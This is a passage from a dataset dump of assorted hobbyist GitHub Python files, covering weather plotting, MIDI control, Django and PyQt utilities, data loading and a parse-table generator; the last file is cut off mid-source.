ET.Element('images')\n\n\n\np = len(images_root)\ni = 0\nfor i in range(p):\n image = images_root[i]\n l = False\n for box in image:\n j = 0\n p2 = len(images_root2)\n\n for j in range(p2):\n image2 = images_root2[j]\n if image.attrib['file'] == image2.attrib['file']:\n for box2 in image2:\n for part in box2:\n box.append(part)\n l = True\n break\n else:\n continue\n if l == True:\n images_root3.append(image)\n\ntree3 = ET.ElementTree(images_root3)\ntree3.write(f2)\n # images_root.append(mirror_images)\nprint('Success!')","repo_name":"charlynka/Facereader","sub_path":"face_recognize_server/Utils/CopyPredictorPoints.py","file_name":"CopyPredictorPoints.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"41118293012","text":"import requests\nimport matplotlib.pyplot as plt\nimport json\nurl = \"http://api.openweathermap.org/data/2.5/onecall\"\ntokken = \"2cce50cfca08d716b19f19de207fcca8\"\nall_datas = {}\ncity_lat_lon = {'tehran':[35.68,51.42], 'esfahan':[32.6539,51.6660], 'mashhad':[36.2605,59.6168]}\n\ndef make_query_for_lat_lon(lat, lon):\n return {\"lat\":lat, \"lon\":lon,\"appid\":tokken,\"exclude\":\"daily, minutely\", \"units\":\"metric\"}\n\n\nclass weather_situation(object):\n def __init__(self, response):\n self.__dict__ = json.loads(response)\n self.make_data_to_plot()\n def make_data_to_plot(self):\n for key, val in self.__dict__['current'].items():\n if key=='weather':\n continue\n if key not in all_datas:\n all_datas[key] = [val]\n else:\n all_datas[key].append(val)\n for i in self.__dict__['hourly']:\n for key, val in i.items():\n if key=='weather' or key=='visibility' or key=='clouds':\n continue\n if key not in all_datas:\n all_datas[key] = [val]\n else:\n all_datas[key].append(val)\n def time_zone(self):\n return self.__dict__['timezone']\nif __name__ == \"__main__\":\n while(1):\n print(\"we can only find city name included: tehran, esfahan, mashhad. 
for rest of city enter lat and lon of them\")\n        state = input(\"if you want weather by city name enter 1 and if you want weather by lat & lon enter 2 and for exit enter e:\")\n        if state == 'e':\n            break\n        if state == '1':\n            city_name = input(\"enter city name:\")\n            lat, lon = city_lat_lon[city_name]\n            query_string = make_query_for_lat_lon(lat, lon)\n        else:\n            lat, lon = input(\"enter lat and lon:\").split()\n            query_string = make_query_for_lat_lon(lat, lon)\n\n        response = requests.request(\"GET\", url, params=query_string)\n        data = weather_situation(response.text)\n\n        parameter_to_plot = ['humidity', 'feels_like', 'temp']\n        for i in parameter_to_plot:\n            plt.plot(all_datas[i],'ro' )\n            plt.plot(all_datas[i] )\n            plt.xlabel('next hours')\n            plt.ylabel(i)\n            plt.title('time zone:'+data.time_zone())\n            plt.show()\n\n        all_datas.clear()\n\n\n","repo_name":"mraarabzadeh/web-data","sub_path":"weatherapi.py","file_name":"weatherapi.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"70260351294","text":"import argparse\nimport glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport seaborn as sns\n\nfrom sklearn.preprocessing import (\n    StandardScaler\n)\nfrom sklearn.manifold import (\n    TSNE\n)\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser('EXVO Training')\n    parser.add_argument(\n        '--data-root', \n        help='Path data has been extracted', \n        required=True\n    )\n    parser.add_argument(\n        '--results-root', \n        help='Path where results are to be stored', \n        required=True\n    )\n    parser.add_argument(\n        '--all-checkpoints',\n        default=False,\n        action='store_true'\n    )\n    args = parser.parse_args()\n\n    df = pd.read_csv(os.path.join(args.data_root, 'data_info.csv'))\n    df['file'] = df['File_ID'].apply(lambda x: x.strip('[').strip(']') + '.wav')\n    df.set_index('file', inplace=True)\n    df_train = df.loc[df['Split'] == 'Train']\n    df_dev = df.loc[df['Split'] == 'Val']\n    df_test = df.loc[df['Split'] == 'Val']\n\n    embeddings = [os.path.join(args.results_root, 'state_exemplar_embeddings.npy')]\n    if args.all_checkpoints:\n        # glob is used below, so it must be imported above\n        embeddings += [\n            os.path.join(args.results_root, '_exemplar_embeddings.npy')\n        ] + glob.glob(os.path.join(args.results_root, '**/state_exemplar_embeddings.npy'))\n    \n    for emb in embeddings:\n        codename = os.path.basename(emb).split('.')[0]\n        if not os.path.exists(os.path.join(os.path.dirname(emb), f'{codename}_tsne.csv')):\n            mapped_emb = TSNE(2).fit_transform(StandardScaler().fit_transform(np.load(emb)))\n            data = pd.DataFrame(\n                data=mapped_emb,\n                index=df_test.index,\n                columns=['TSNE_1', 'TSNE_2']\n            )\n            data['Subject_ID'] = df_test['Subject_ID']\n            data['Country'] = df_test['Country_string']\n            data.to_csv(os.path.join(os.path.dirname(emb), f'{codename}_tsne.csv'))\n        else:\n            data = pd.read_csv(os.path.join(os.path.dirname(emb), f'{codename}_tsne.csv'))\n            data.set_index('file', inplace=True)\n\n        data['Country'] = df_test['Country_string']\n        plt.figure()\n        sns.scatterplot(\n            data=data,\n            x='TSNE_1',\n            y='TSNE_2',\n            hue='Country',\n            s=10,\n            palette=\"tab10\"\n        )\n        plt.title('Country')\n        plt.tight_layout()\n        plt.savefig(os.path.join(os.path.dirname(emb), f'{codename}_tsne_country.png'))\n        plt.close()\n\n        plt.figure()\n        g = sns.scatterplot(\n            data=data,\n            x='TSNE_1',\n            y='TSNE_2',\n            hue='Subject_ID',\n            s=10\n        )\n        g.legend_.remove()\n        plt.title('Subject_ID')\n        plt.tight_layout()\n        plt.savefig(os.path.join(os.path.dirname(emb), f'{codename}_tsne_speaker.png'))\n        
plt.close()","repo_name":"ATriantafyllopoulos/exvo-eihw-personalisation","sub_path":"embedding_visualisation.py","file_name":"embedding_visualisation.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"21195644468","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom qt import QMutex, SIGNAL\nfrom kdecore import i18n\n\nimport dbus\nimport dbus.mainloop.qt3\n\nfrom handler import CallHandler\n\nclass ComarIface:\n \"\"\" Comar Interface to communicate with Comar \"\"\"\n def __init__(self, handler=None, errHandler=None):\n self.errHandler = errHandler\n self.handler = handler\n # package-manager sync\n self.com_lock = QMutex()\n if self.setupBusses():\n self.setupSignals()\n else:\n self.errHandler()\n return\n\n def setupBusses(self):\n try:\n # get system and session busses\n self.sysBus = dbus.SystemBus()\n self.sesBus = dbus.SessionBus()\n except dbus.DBusException:\n self.errHandler(i18n(\"Cannot connect to dbus\"))\n return False\n return True\n\n def setupSignals(self):\n self.sysBus.add_signal_receiver(self.handleSignals, dbus_interface=\"tr.org.pardus.comar.System.Manager\", member_keyword=\"signal\", path_keyword=\"path\")\n\n def handleSignals(self, *args, **kwargs):\n signal = kwargs[\"signal\"]\n if self.handler:\n self.handler(signal, args)\n\n def busError(self, exception):\n message = i18n(\"D-Bus Error\") + str(exception)\n self.setupBusses()\n self.errHandler(message)\n\n def comarAuthError(self, exception):\n self.errHandler(i18n(\"COMAR Auth Error\") + str(exception))\n\n def comarError(self, exception):\n message = \"\"\n if not \"urlopen error\" in exception.message:\n message += i18n(\"COMAR Error\")\n self.errHandler(message + \"
    \" + str(exception))\n\n def cancelError(self):\n message = i18n(\"You are not authorized for this operation.\")\n self.errHandler(message)\n\n def callMethod(self, method, action, handler, handleErrors, *args):\n ch = CallHandler(\"System.Manager\", method, action, self.sysBus, self.sesBus)\n\n if handleErrors:\n ch.registerError(self.comarError)\n ch.registerAuthError(self.comarAuthError)\n ch.registerDBusError(self.busError)\n ch.registerCancel(self.cancelError)\n if handler:\n ch.registerDone(handler)\n\n ch.call(*args)\n\n def takeSnapshot(self):\n self.com_lock.lock()\n self.callMethod(\"takeSnapshot\", \"tr.org.pardus.comar.system.manager.takesnapshot\", self.handler, True)\n\n def takeBack(self, operation):\n self.com_lock.lock()\n self.callMethod(\"takeBack\", \"tr.org.pardus.comar.system.manager.takeback\", None, True, int(operation))\n\n def cancel(self):\n obj = self.sysBus.get_object(\"tr.org.pardus.comar\", \"/\", introspect=False)\n obj.cancel(dbus_interface=\"tr.org.pardus.comar\")\n\n","repo_name":"pisilinux/uludag","sub_path":"branches/kde/history-manager/2008/src/ComarIface.py","file_name":"ComarIface.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"39050715974","text":"from os import F_OK\nfrom ..utils import decode_jwt, send_json\nfrom ..models import User\nfrom ..decorators import login_required\nfrom ..responses import userDoesNotExist, ok, no\nfrom django.views import View\n\nclass IsAdminView(View):\n @login_required\n def get(self, request):\n session = request.session\n decoded = decode_jwt(session)\n userid = decoded['userid']\n found = User.objects.filter(id=userid)\n if found.count() != 1:\n return send_json(userDoesNotExist)\n user = found[0]\n if user.isAdmin:\n data = ok\n else:\n data = no\n return send_json(data)\n","repo_name":"DPS0340/DjangoCRUDBoard","sub_path":"board/views/isAdmin.py","file_name":"isAdmin.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"78"} +{"seq_id":"5972423371","text":"\"\"\"\nAlfred Gachanja\n27-07-2023\nIn this program I am using a function to print a list of my friends.\n\"\"\"\n\ndef show_friends(friends):\n print(\"This is a list of all my friends.\")\n for friend in friends:\n print(\"\\t{}\" .format(friend.title()))\n\nfriends = ['bill', 'davis', 'eric', 'kelvin', 'sandra', 'binzare']\nshow_friends(friends)","repo_name":"Alfredchanja/Python_Scripts","sub_path":"Part_1/Chapter_8/Friends.py","file_name":"Friends.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75099731453","text":"#!/usr/bin/python3\n\nimport time\nimport mido\nimport os\nimport subprocess\nimport re\nimport requests\nimport sys\n\nimport asyncio\nimport websockets\n\n# midi device naming; avoid spaces\nname = \"MidiCmdServer2\"\n\n# system command to set up the midi thru port\n# TODO would be nice to do this in python, but\n# rtmidi has issues seeing ports it has created\n#os.system(runCmd)\namidiProc = subprocess.Popen(['amidithru', name])\n\n# regex to match on rtmidi port name convention\nnameRegex = \"(\" + name + \":\" + name + \"\\s+\\d+:\\d+)\"\nmatcher = re.compile(nameRegex)\nnewList = list(filter(matcher.match, mido.get_input_names()))\ninput_name = newList[0]\n\n# Parse list of AMSythn preset names to map to CC control values\npresets = 
[line.rstrip('\\n') for line in open('/home/patch/presetmap.txt')]\n\n# Used to avoid resending of duplicates as there seems to be multiple MIDI requests come through\nlastPresets = [ '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '' ]\n\n# Websocket class. Makes (and restores) a single connection for multiple socket requests\nclass WebSocket:\n __ws = None\n __url = \"ws://patchbox.local/websocket\"\n\n def __init__(self):\n self.retryTime = 0\n self.retryRepeat = 30\n self.__create_connect()\n\n @asyncio.coroutine\n def __create_connect(self):\n if self.__ws is None:\n if (time.time() - self.retryTime) > self.retryRepeat:\n try:\n self.__ws = yield from websockets.connect(self.__url)\n self.retryTime = 0\n except ConnectionRefusedError:\n self.retryTime = time.time()\n\n def connect(self):\n if self.__ws is None:\n asyncio.get_event_loop().run_until_complete(self.__create_connect())\n\n def send(self, msg):\n if self.__ws is not None:\n try:\n asyncio.get_event_loop().run_until_complete(self.__async_send(msg))\n except ConnectionRefusedError:\n self.__create_connect()\n else:\n asyncio.get_event_loop().run_until_complete(self.__create_connect())\n\n async def __async_send(self, message):\n await self.__ws.send(message)\n\n# Simple function for GET requests\ndef get(URL, PARAMS):\n global session\n return session.get(url = URL, params = PARAMS)\n\n# keep running and watch for midi cc\nwhile True:\n\n # Establish a web session for GET requests\n session = requests.Session()\n print(\"Session setup\")\n # Establish a websocket connection\n # NOTE: needed to call .connect manually as it doesn't seem to connect through the __init__\n socket = WebSocket()\n socket.connect()\n print(\"socket connected\")\n\n try:\n # set up backend\n mido.set_backend('mido.backends.rtmidi')\n \n with mido.open_input(input_name) as inport:\n print(\"Connected to rtmidi backend\")\n\n # Process the MIDI messages received\n for msg in inport:\n if msg.type == \"control_change\":\n # TouchOSC CH16 - on/off for AMSynth Instrument preset GET requests\n if msg.channel == 15 and msg.value == 127 and lastPresets[15] != msg.control:\n r = get( 'http://patchbox.local/effect/preset/load/graph/amsynth_1', {'uri':'http://code.google.com/p/amsynth/amsynth#' + presets[msg.control]} )\n lastPresets[15] = msg.control\n\n # TouchOSC CH15 - FluidDrums preset selection by program number - uses websocket\n if msg.channel == 14 and lastPresets[14] != msg.control:\n cmd = \"param_set \" + \"/graph/FluidPlug_FluidDrums/program \" + str(msg.control)\n socket.send( cmd )\n lastPresets[14] = msg.control\n break\n except KeyboardInterrupt:\n print(\"BYE!!!!\")\n break\n except:\n # If unable to connect to rtmidi backend\n # (which sometimes happens when starting), retry after 2 secs\n print(\"Retrying to connect to rtmidi backend\")\n time.sleep(2)\n","repo_name":"Greg209/patchbox-modep-stuff","sub_path":"midi_cmd_server.py","file_name":"midi_cmd_server.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"19547753230","text":"from __future__ import absolute_import\n\nfrom PyQt4.QtGui import QDialog\nfrom PyQt4.QtGui import QGridLayout\nfrom PyQt4.QtGui import QLabel\nfrom PyQt4.QtGui import QLineEdit\nfrom PyQt4.QtGui import QPlainTextEdit\nfrom PyQt4.QtGui import QComboBox\nfrom PyQt4.QtGui import QIcon\nfrom PyQt4.QtGui import QFileDialog\nfrom PyQt4.QtGui import QPushButton\nfrom PyQt4.QtGui import QHBoxLayout\nfrom 
PyQt4.QtGui import QMessageBox\nfrom PyQt4.QtCore import SIGNAL\n\nfrom ninja_ide.tools import manage_files\nfrom ninja_ide.tools import loader\nfrom ninja_ide import resources\nfrom ninja_ide.extras.plugins import TextProjectType\n\n\nclass ProjectProperties(QDialog):\n\n def __init__(self, parent, item):\n QDialog.__init__(self, parent)\n self.setModal(True)\n self._item = item\n self.setWindowTitle('Project Properties')\n grid = QGridLayout(self)\n grid.addWidget(QLabel('Name:'), 0, 0)\n self.name = QLineEdit()\n if self._item.name == '':\n self.name.setText(manage_files.get_basename(self._item.path))\n else:\n self.name.setText(self._item.name)\n grid.addWidget(self.name, 0, 1)\n grid.addWidget(QLabel('Project Type:'), 1, 0)\n self.txtType = TextProjectType()\n self.txtType.setText(self._item.projectType)\n grid.addWidget(self.txtType, 1, 1)\n grid.addWidget(QLabel('Description:'), 2, 0)\n self.description = QPlainTextEdit()\n self.description.setPlainText(self._item.description)\n grid.addWidget(self.description, 2, 1)\n grid.addWidget(QLabel('URL:'), 3, 0)\n self.url = QLineEdit()\n self.url.setText(self._item.url)\n grid.addWidget(self.url, 3, 1)\n grid.addWidget(QLabel('Licence:'), 4, 0)\n self.cboLicense = QComboBox()\n self.cboLicense.addItem('Apache License 2.0')\n self.cboLicense.addItem('Artistic License/GPL')\n self.cboLicense.addItem('Eclipse Public License 1.0')\n self.cboLicense.addItem('GNU General Public License v2')\n self.cboLicense.addItem('GNU General Public License v3')\n self.cboLicense.addItem('GNU Lesser General Public License')\n self.cboLicense.addItem('MIT License')\n self.cboLicense.addItem('Mozilla Public License 1.1')\n self.cboLicense.addItem('New BSD License')\n self.cboLicense.addItem('Other Open Source')\n self.cboLicense.addItem('Other')\n self.cboLicense.setCurrentIndex(4)\n index = self.cboLicense.findText(self._item.license)\n self.cboLicense.setCurrentIndex(index)\n grid.addWidget(self.cboLicense, 4, 1)\n grid.addWidget(QLabel('Main File:'), 5, 0)\n self.path = QLineEdit()\n self.path.setText(self._item.mainFile)\n self.path.setReadOnly(True)\n self.btnBrowse = QPushButton('Browse')\n hbox = QHBoxLayout()\n hbox.addWidget(self.path)\n hbox.addWidget(self.btnBrowse)\n grid.addLayout(hbox, 5, 1)\n\n self.txtExtensions = QLineEdit()\n self.txtExtensions.setText(str(', '.join(self._item.extensions)))\n grid.addWidget(QLabel('Supported Extensions:'), 6, 0)\n grid.addWidget(self.txtExtensions, 6, 1)\n\n self.txtPythonPath = QLineEdit()\n self.txtPythonPath.setText(self._item.pythonPath)\n self.btnPythonPath = QPushButton(QIcon(resources.images['open']), '')\n grid.addWidget(QLabel('Python Path:'), 7, 0)\n grid.addWidget(self.txtPythonPath, 7, 1)\n grid.addWidget(self.btnPythonPath, 7, 2)\n\n self.btnSave = QPushButton('Save')\n self.btnCancel = QPushButton('Cancel')\n hbox3 = QHBoxLayout()\n hbox3.addWidget(self.btnCancel)\n hbox3.addWidget(self.btnSave)\n grid.addLayout(hbox3, 8, 1)\n\n self.connect(self.btnBrowse, SIGNAL(\"clicked()\"), self.select_file)\n self.connect(self.btnCancel, SIGNAL(\"clicked()\"), self.close)\n self.connect(self.btnSave, SIGNAL(\"clicked()\"), self.save_properties)\n self.connect(self.btnPythonPath, SIGNAL(\"clicked()\"), self._load_python_path)\n\n def _load_python_path(self):\n path = str(QFileDialog.getOpenFileName(self, 'Select Python Path'))\n self.txtPythonPath.setText(path)\n\n def select_file(self):\n fileName = str(QFileDialog.getOpenFileName(self, 'Select Main File',\n self._item.path, '(*.py);;(*.*)'))\n if 
fileName != '':\n fileName = manage_files.convert_to_relative(self._item.path, fileName)\n self.path.setText(fileName)\n\n def save_properties(self):\n if str(self.name.text()).strip() == '':\n QMessageBox.critical(self, 'Properties Invalid', 'The Project must have a name.')\n return\n tempName = self._item.name\n self._item.name = str(self.name.text())\n self._item.description = str(self.description.toPlainText())\n self._item.license = str(self.cboLicense.currentText())\n self._item.mainFile = str(self.path.text())\n self._item.url = str(self.url.text())\n self._item.projectType = str(self.txtType.text())\n self._item.pythonPath = str(self.txtPythonPath.text())\n extensions = str(self.txtExtensions.text()).split(', ')\n self._item.extensions = tuple(extensions)\n #save project properties\n project = {}\n project['name'] = self._item.name\n project['description'] = self._item.description\n project['url'] = self._item.url\n project['license'] = self._item.license\n project['mainFile'] = self._item.mainFile\n project['project-type'] = self._item.projectType\n project['supported-extensions'] = self._item.extensions\n project['pythonPath'] = self._item.pythonPath\n if tempName != self._item.name and \\\n manage_files.file_exists(self._item.path, tempName + '.nja'):\n manage_files.delete_file(self._item.path, tempName + '.nja')\n loader.create_ninja_project(self._item.path, self._item.name, project)\n self._item.setText(0, self._item.name)\n self._item.setToolTip(0, self._item.name)\n if self._item.extensions != manage_files.supported_extensions:\n self._item._parent._refresh_project(self._item)\n self.close()\n","repo_name":"aztli/Traducciones","sub_path":"Ninja/ninja_ide/gui/qt/properties_panel/project_properties.py","file_name":"project_properties.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"34283070198","text":"import os\nimport urllib3\nimport zipfile\nimport tempfile\nfrom celery import task\nfrom django.conf import settings\nfrom django.template import Context\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import get_template\n\n\n@task\ndef email_zip(emails, errors, zipfile):\n \"\"\"\n Accepts emails, error log dict and zipfile path and send an\n emails to provided emails with zip as an attachment.\n \"\"\"\n recipient = []\n for email in emails.split(','):\n recipient.append(email)\n msg = EmailMessage(\n 'Html Files Zip - Assignment', 'ErrorLog: \\n' + str(errors), settings.EMAIL_HOST_USER, to=[] + recipient\n )\n msg.attach_file(zipfile, mimetype='application/octet-stream')\n msg.send()\n os.remove(zipfile)\n\n\n@task\ndef download_url_as_html(urls, emails):\n \"\"\"\n Accepts urls and emails lists and download html from provided urls\n and create zip file of html files.\n \"\"\"\n errors = {}\n with tempfile.NamedTemporaryFile(suffix='_%s' % 'urls_html.zip', delete=False) as tmp:\n with zipfile.ZipFile(tmp.name, 'w') as htmlzip:\n for url in urls.split(','):\n try:\n conn = urllib3.connection_from_url(url)\n content = conn.request('GET', '/', assert_same_host=False)\n except Exception as e:\n errors.update({url: str(e.reason)})\n continue\n domain = url.split('//')\n fp = tempfile.NamedTemporaryFile(\n prefix='%s_' % domain[1] if domain[1] else domain[0])\n fp.write(content._body)\n htmlzip.write(fp.name)\n fp.close()\n email_zip.delay(emails, errors, tmp.name)\n return 
{}\n","repo_name":"rinkurajole/URLDownloader","sub_path":"src/urldownloader/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39683578688","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndef data_load(path_raw_data, test_size, random_state,\n path_save_train, path_save_test):\n data = pd.read_csv(path_raw_data)\n data = data.dropna()\n work_type_data = pd.get_dummies(data['work_type'], prefix='work')\n smoking_status = pd.get_dummies(data['smoking_status'], prefix='smoking')\n data_prepared = data[['gender', 'age', 'hypertension', 'heart_disease', 'ever_married', 'avg_glucose_level', 'bmi']]\n data_prepared = pd.concat([data_prepared, work_type_data, smoking_status], axis=1).drop(columns=['smoking_Unknown'])\n data_prepared['gender'] = data_prepared['gender'].map(lambda x: int(x == 'Male'))\n data_prepared['ever_married'] = data_prepared['ever_married'].map(lambda x: int(x == 'Yes'))\n data_prepared['stroke'] = data['stroke']\n train, test = train_test_split(data_prepared, test_size=test_size,\n random_state=random_state)\n train.to_csv(path_save_train)\n test.to_csv(path_save_test)\n return train, test\n","repo_name":"TstGH/MLProd_tst","sub_path":"ml_project/src/data/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18976176645","text":"import plotly.plotly as py\nimport plotly.graph_objs as go\nimport plotly\nimport plotly.io as pio\nimport colorlover as cl\nfrom collections import defaultdict\nfrom csv import DictReader\n\ndef save_figure(fn, fig):\n plotly.offline.plot(fig, filename=fn + '.html', auto_open=False, show_link=True)\n pio.write_image(fig, fn + '.png')\n pio.write_image(fig, fn + '.pdf')\n\nfn = \"E:/YandexDisk/Work/pydnameth/draft/fisher/GSE87571/betas/v6/Relation_to_UCSC_CpG_Island.csv\"\n\ntable_dict = defaultdict(list)\nwith open(fn, 'r') as f:\n reader = DictReader(f)\n for row in reader:\n for col, dat in row.items():\n table_dict[col].append(dat)\n\n#x_data = [('chr' + str(x)) for x in table_dict['CHR']]\nx_data = table_dict['Relation_to_UCSC_CpG_Island']\ny_data = list(map(float, table_dict['OR']))\n\nless_ids = [id for id in range(0, len(y_data)) if y_data[id] < 1]\nmore_ids = [id for id in range(0, len(y_data)) if y_data[id] >= 1]\n\ntraces = []\nfor id in range(0, len(y_data)):\n if y_data[id] < 1.0:\n trace = go.Bar(\n x=[x_data[id]],\n y=[1 - y_data[id]],\n base=[y_data[id]],\n marker=dict(\n color='rgba(55, 128, 191, 0.7)',\n line=dict(\n color='rgba(55, 128, 191, 1.0)',\n width=2,\n )\n )\n )\n else:\n trace = go.Bar(\n x=[x_data[id]],\n y=[y_data[id] - 1.0],\n base=[1.0],\n marker=dict(\n color='rgba(55, 128, 191, 0.7)',\n line=dict(\n color='rgba(55, 128, 191, 1.0)',\n width=2,\n )\n )\n )\n traces.append(trace)\n\nlayout = go.Layout(\n showlegend=False,\n yaxis=dict(\n title='Odds ratio',\n type='log',\n autorange=True,\n showgrid=True,\n showline=True,\n mirror='ticks',\n titlefont=dict(\n family='Arial',\n size=33,\n color='black'\n ),\n showticklabels=True,\n tickangle=0,\n tickfont=dict(\n family='Arial',\n size=30,\n color='black'\n ),\n exponentformat='e',\n showexponent='all',\n tickvals=[0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1, 2, 5, 10],\n #tickvals=[0.4, 0.06, 0.8, 1.0, 1.4, 1.8, 2.2, 2.6],\n #ticktext=['One', 
'Three', 'Five', 'Seven', 'Nine', 'Eleven']\n ),\n xaxis=dict(\n autorange=True,\n showgrid=True,\n showline=True,\n mirror='ticks',\n tickangle=90,\n titlefont=dict(\n family='Arial',\n size=20,\n color='black'\n ),\n showticklabels=True,\n tickfont=dict(\n family='Arial',\n size=20,\n color='black'\n ),\n exponentformat='e',\n showexponent='all',\n ),\n autosize=True,\n margin=go.layout.Margin(\n l=120,\n r=20,\n b=120,\n t=20,\n pad=0\n ),\n barmode='overlay',\n)\n\nfig = go.Figure(data=traces, layout=layout)\n#py.plot(fig, filename='waterfall-bar-profit')\n\nsave_figure('barplot', fig)","repo_name":"GillianGrayson/dna-methylation","sub_path":"dna-methylation/routines/first_paper/barplot.py","file_name":"barplot.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28286323071","text":"import tensorflow as tf\r\nimport math\r\n\r\n\r\ndef build_t_model(trajectories):\r\n \"\"\"\r\n Function to build a subgraph\r\n \"\"\"\r\n h1_t_units = 1\r\n h2_t_units = 1\r\n M = 1\r\n\r\n with tf.variable_scope('h1_t'):\r\n weights = tf.get_variable('weights', shape=[])\r\n biases = tf.get_variable('biases', shape=[])\r\n h1_t = trajectories*weights + biases\r\n\r\n with tf.variable_scope('h2_t'):\r\n weights = tf.get_variable('weights', shape=[])\r\n biases = tf.get_variable('biases', shape=[])\r\n h2_t = h1_t*weights + biases\r\n\r\n with tf.variable_scope('h3_t'):\r\n weights = tf.get_variable('weights', shape=[])\r\n biases = tf.get_variable('biases', shape=[])\r\n h3_t = h2_t*weights + biases\r\n\r\n return h3_t\r\n\r\n\r\ng1 = tf.Graph()\r\nwith g1.as_default():\r\n input1 = tf.placeholder(dtype=tf.float32, name=\"input1\")\r\n input2 = tf.placeholder(dtype=tf.float32, name=\"input2\")\r\n with tf.variable_scope('traj_embedding') as scope:\r\n with tf.name_scope(\"leg1\"):\r\n embeddings_left = build_t_model(input1)\r\n scope.reuse_variables()\r\n with tf.name_scope(\"leg2\"):\r\n embeddings_right = build_t_model(input2)\r\n # for id, v in enumerate(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='traj_embedding')):\r\n # print((id, v))\r\n\r\nwith tf.Session(graph=g1) as sess:\r\n train_writer = tf.summary.FileWriter(\"./test/\", sess.graph)\r\n # tf.global_variables_initializer().run()\r\n for var in tf.trainable_variables(scope='traj_embedding'):\r\n if var._trainable:\r\n sess.run(tf.assign(var, 0))\r\n else:\r\n continue\r\n w, v = sess.run([embeddings_left, embeddings_right], feed_dict={input1: 0, input2: 0})","repo_name":"MaxKinny/kaggle_SMILE-Kinship-Recognizing","sub_path":"vggface2_inception_resnet_v1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"15254066689","text":"from numpy import *\nfrom PIL import Image\nfrom os import listdir\n\noutfile = open(\"src/sprites.json\", \"w\")\ntsfile = open(\"src/SpriteTypes.ts\", \"w\")\n\noutfile.write(\"{\\n\")\n\ntsfile.write(\"export enum SpriteTypes {\\n\")\n\nid = 0\n\nspriteCount = len(listdir(\"sprites\"))\nspriteCounter = 0\n\nfor file in listdir(\"sprites\"):\n spriteName = file.split(\".\")[0]\n if \"LOWER\" in spriteName:\n spriteName = spriteName.replace(\"LOWER\", \"\")\n elif \"UPPER\" in spriteName:\n spriteName = spriteName.replace(\"UPPER\", \"\")\n im = Image.open(\"sprites/\" + file)\n x = asarray(im)\n width = size(x, 1)\n height = size(x, 0)\n data = []\n for i in x:\n buf = []\n 
for j in i:\n try:\n buf.append(\"1\" if j[3] == 255 else \"0\")\n except Exception:\n print(\n \"File: \" + file + \" has an incorrect bit-depth, files must have a bit-depth of 32 bits.\")\n break\n data.append(buf)\n\n outfile.write('\\n\"' + str(id) + '\": {\\n')\n outfile.write('\"name\": \"' + spriteName + '\",\\n')\n id += 1\n outfile.write('\"width\": ' + str(width) + ',\\n')\n outfile.write('\"height\": ' + str(height) + ',\\n')\n outfile.write('\"data\": [\\n')\n count = 0\n for item in data:\n if (count == len(data) - 1):\n outfile.write('[' + \",\".join(item) + ']\\n')\n else:\n outfile.write('[' + \",\".join(item) + '],\\n')\n count += 1\n if (spriteCounter == spriteCount - 1):\n outfile.write(']\\n}\\n')\n tsfile.write(\"\\t\" + spriteName + \"\\n\")\n else:\n tsfile.write(\"\\t\" + spriteName + \",\\n\")\n outfile.write(']\\n},\\n')\n spriteCounter += 1\n im.close()\n\ntsfile.write(\"}\")\noutfile.write('\\n}')\noutfile.close()\ntsfile.close()\n","repo_name":"ObliviousReality/jacdac-lcd-dashboard","sub_path":"spritetojson.py","file_name":"spritetojson.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33520603084","text":"# coding=utf-8\n\"\"\"\nxxx\n\"\"\"\n__author__ = 'eendro'\n\nfrom Follow import Follow\n\n\n# noinspection PyDocstring\nclass ParseTable(object):\n \"\"\"\n \"\"\"\n\n def __init__(self):\n self.__followObj = Follow()\n self.__grammarObj = self.__followObj.get_grammar_object()\n self.__firstObj = self.__followObj.get_first_object()\n self.__variableList = self.__grammarObj.get_variables()\n self.__terminalList = self.__grammarObj.get_terminals()\n self.__parseTable = [{'variable': \"\", 'terminal': \"\", 'product': [[]]}]\n\n @staticmethod\n def __remove_duplicate(_list):\n temp = [{}]\n for i in _list:\n if not temp.__contains__(i):\n temp.append(i)\n temp.remove({})\n return temp\n\n def get_follow_object(self):\n return self.__followObj\n\n def get_first_object(self):\n return self.__firstObj\n\n def get_grammar_object(self):\n return self.__grammarObj\n\n def get_parse_table(self):\n return self.__parseTable\n\n def generate_parse_table(self):\n \"\"\"\n \"\"\"\n rules = 